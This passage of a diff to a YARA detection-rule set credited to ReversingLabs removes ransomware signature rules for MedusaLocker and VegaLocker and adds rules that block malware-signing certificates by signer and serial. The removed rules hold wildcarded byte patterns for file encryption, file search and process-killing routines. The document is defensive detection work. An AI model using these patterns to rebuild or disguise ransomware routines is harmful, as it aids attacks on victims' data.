-            84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ??
-            ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79
-            ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A
-            ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ??
-            ?? ?? ?? 68
-        }
-		$find_files_3 = {
-            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
-            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
-            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24
-            ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
-            ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
-            ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ??
-            8B 4C 24 ?? 39 7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB
-            43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D
-            74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( $create_encryption_key ) and ( $encrypt_encryption_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) and 1665100800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Medusalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MedusaLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8bfcfe13-b519-5c03-9770-cf245b01c395"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "681d233c-d5a2-5f25-bdb9-125149a291c4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.MedusaLocker.yara#L1-L174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73f915d476d1411d2e008d00c5ffa03596e3b62bcdbc4d91dc7226599a066c08"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11066-L11084"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MedusaLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83
-            7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
-            8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57
-            C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ??
-            ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ??
-            6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_p2 = {
-            8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ??
-            ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
-        }
-		$encrypt_files_p3 = {
-            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ??
-            ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ??
-            ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ??
-            89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
-            C2
-        }
-		$search_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D
-            ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83
-            7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B
-            45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ??
-            ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85
-            ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ??
-            ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57
-            FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
-            8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$search_files_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ??
-            ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ??
-            ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68
-            ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ??
-            ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ??
-            ?? ?? ?? 83 C4 ?? EB
-        }
-		$enum_resources = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ??
-            ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89
-            54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51
-            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D
-            4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B
-            55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
-            8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$kill_processes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D
-            ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ??
-            ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32
-            C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$kill_processes_call = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ??
-            89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
-		$enum_resources_call = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $kill_processes_call ) and ( $kill_processes ) and ( $enum_resources ) and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources_call )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and ( pe.signatures [ i ] . serial == "00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" ) and 1636588800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects VegaLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "508d9c00-c209-55b2-9a40-b62ff4d866c9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11086-L11102"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "VegaLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
-            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
-            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
-            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
-            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
-            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
-            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85
-            ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68
-            ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
